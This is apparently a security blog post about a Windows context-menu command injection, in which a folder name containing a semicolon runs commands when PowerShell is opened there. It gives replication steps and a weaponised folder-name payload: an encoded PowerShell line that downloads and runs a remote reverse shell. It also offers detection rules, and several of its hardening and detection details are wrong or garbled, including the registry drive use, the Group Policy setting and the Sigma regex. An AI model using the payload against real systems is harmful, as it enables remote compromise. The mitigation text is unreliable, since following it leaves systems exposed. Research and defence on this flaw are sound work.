Shift + Right-Click = Game Over? 9-Year-Old Windows Command Injection Finally Exposed + Video

Listen to this Post

Featured Image

Introduction

A routine action as simple as holding the Shift key and right-clicking a folder to open PowerShell has been a potential zero-click gateway for silent compromise. Security researcher Rémi Gascou (Podalirius) uncovered that two built-in command injection vulnerabilities have been lurking in Windows context menus since 2017, allowing an attacker to execute arbitrary commands simply by tricking a user into opening PowerShell in a folder with a maliciously crafted name.

Learning Objectives

  • Understand how improper command sanitization in Windows Registry enables command injection via folder names.
  • Learn to detect, replicate, and mitigate the “Shift + Right-Click” PowerShell injection vulnerability.
  • Acquire practical skills for hardening Windows systems and monitoring for exploitation attempts.

You Should Know

  1. Anatomy of the Injection: From Spaces to Semicolons

The core vulnerability stems from how Windows constructs the PowerShell command when a user selects “Open PowerShell window here” from the extended context menu. The command template stored in the registry is:

HKEY_CLASSES_ROOT\Directory\shell\Powershell\command
(Default) = powershell.exe -noexit -command Set-Location -literalPath "%V"

When a folder name contains a space, PowerShell misinterprets the path, breaking it into separate arguments. But the real danger arises when an attacker uses a semicolon (;), which acts as a command separator in PowerShell. Creating a folder named `folder; calc` transforms the executed command from `Set-Location -literalPath “C:\path\to\folder”` into:

Set-Location -literalPath C:\path\to\folder; calc

PowerShell then runs Calculator after changing the directory. This is not just a proof of concept; it is a fully weaponizable vector.

Step-by-Step Guide: Replicating the Vulnerability

To see this in action (on a test system, not production):

1. Create a new folder on your Desktop.

  1. Rename it to `test; calc.exe` (note the semicolon).
  2. Hold Shift, right-click the folder, and select “Open PowerShell window here.”
  3. Observe that PowerShell opens and Calculator launches immediately.

You can test other payloads as NTFS allows folder names with semicolons without spaces, such as `foldername;calc.exe` or foldername(calc). For older Windows builds (versions before the fix), the registry entry uses single quotes instead of double quotes, requiring a payload like ';calc;'.

  1. Weaponization: Turning a Foldername into a Full Blown Exploit

The injection is not limited to local drives. Attackers can distribute malicious ZIP files containing a project folder named with a payload. When a developer extracts the archive, navigates into the folder, and uses the “Open PowerShell window here” shortcut, the code executes without any warning. The GitHub repository for this research provides multiple scenarios, including backgrounds of Explorer windows and shortcuts that lead users into malicious folders.

Here is a more advanced PowerShell reverse shell payload as a folder name:

folder; powershell -NoP -NonI -W Hidden -Exec Bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAxADoAOAAwADAAMAAvAHIAZQB2AGUAcgBzAGUAcwBoAGUAbABsACcAKQ==

When the user Shift+Right-Clicks that folder and opens PowerShell, the encoded reverse shell executes, giving the attacker a foothold.

3. Hardening Windows: Removing the Threat

Security is about reducing the attack surface. The most effective mitigation is to remove the vulnerable context menu entry entirely via Group Policy or Registry.

Step-by-Step Guide: Disabling “Open PowerShell window here”

Method 1: Registry Editor (Manual)

  1. Press Win + R, type regedit, and press Enter.

2. Navigate to `HKEY_CLASSES_ROOT\Directory\shell\Powershell`.

3. Right-click the `Powershell` key and select Permissions.

  1. Add `SYSTEM` with Deny permissions for “Read” and “Full Control.”
  2. Do the same for `HKEY_CLASSES_ROOT\Directory\Background\shell\Powershell` to cover background clicks.

Method 2: PowerShell as Administrator (Recommended for automation)

Run the following command to remove the key and prevent its recreation:

Remove-Item -Path "HKCR:\Directory\shell\Powershell" -Recurse -Force
Remove-Item -Path "HKCR:\Directory\Background\shell\Powershell" -Recurse -Force

Method 3: Group Policy (Enterprise environments)

Navigate to `Computer Configuration → Administrative Templates → System → Group Policy` and configure “Configure PowerShell policy logging” to disable the context menu entirely.

4. Detection and Monitoring: Blue Team Arsenal

Detecting exploitation attempts requires monitoring specific process creation events. When a user triggers the vulnerability, `explorer.exe` spawns `powershell.exe` with unusual command-line arguments containing semicolons, ampersands, or encoded payloads.

Step-by-Step Guide: Setting Up Detection

  1. Enable PowerShell Logging (Group Policy or local policy):

– Enable “Turn on PowerShell Script Block Logging”.
– Enable “Turn on PowerShell Module Logging”.

2. Monitor Windows Event Logs:

  • Event ID 400: Engine state change – suspicious command strings.
  • Event ID 4104: Script block logging – look for semicolons, encoded commands, and -Enc.
  1. Deploy a Sysmon Rule to detect `explorer.exe` spawning `powershell.exe` with injection patterns. Example filter:
<Sysmon>
<EventFiltering>
<ProcessCreate onmatch="include">
<ParentImage condition="is">C:\Windows\explorer.exe</ParentImage>
<Image condition="end with">powershell.exe</Image>
<CommandLine condition="contains">Set-Location -literalPath</CommandLine>
</ProcessCreate>
</EventFiltering>
</Sysmon>
  1. Use Sigma Rules to hunt for these patterns across your SIEM. The following Sigma rule detects suspicious PowerShell command lines containing semicolons and -literalPath:
title: Suspicious PowerShell Command Line via Context Menu
status: experimental
logsource:
product: windows
service: security
detection:
selection:
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine|contains: 'Set-Location -literalPath'
CommandLine|re: '.;.calc.'
condition: selection
  1. AI Training Dataset Poisoning: A Silent Threat Amplifier

The SpecterOps research highlights a concerning secondary risk: these vulnerable command templates have likely been ingested into large language model (LLM) training datasets since 2017. When models like GPT-4, Claude, or Gemini are asked to generate PowerShell scripts for context menus, they reproduce the vulnerable single-quoted template without any security warnings.

Step-by-Step Guide: Testing LLMs for Vulnerable Code

  1. Prompt an LLM with: “Write a PowerShell script that creates a new context menu in Windows Explorer when a user right-clicks on a folder to open a PowerShell window here.”

2. Examine the output. Most models will generate:

powershell.exe -NoExit -Command Set-Location -LiteralPath '%V'

3. Check if the LLM includes any warning about command injection or improper quoting. In the SpecterOps study, none of the tested models did.

This finding underscores the need for security-aware AI training and careful review of AI-generated code.

What Undercode Say

  • Silent, Persistent, and Low Hanging Fruit: This vulnerability has been present for nine years, requiring no exploit delivery beyond a malicious folder name. Yet Microsoft declined to assign a CVE, raising serious questions about what is considered a security boundary.
  • Harden Don’t Pause: Since a full patch is unlikely for older systems, immediate administrative action is required: disable the context menu, enforce strict logging, and train users to avoid opening PowerShell in unfamiliar directories.
  • AI Assists but Also Amplifies Risk: LLMs are currently generating vulnerable code without warnings, making them an unwitting distribution channel for these patterns. The security community must push for safety classifiers in AI code generation.

Prediction

Attackers will integrate this technique into phishing kits and initial access brokers within months. Expect to see malicious ZIP files redistributed via public repositories and email attachments, with folder names containing obfuscated reverse shells. Microsoft’s decision not to treat this as a security boundary means enterprise defenders will bear the full burden of mitigation—making registry hardening and PowerShell logging mandatory controls rather than optional best practices.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Shift Happens – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky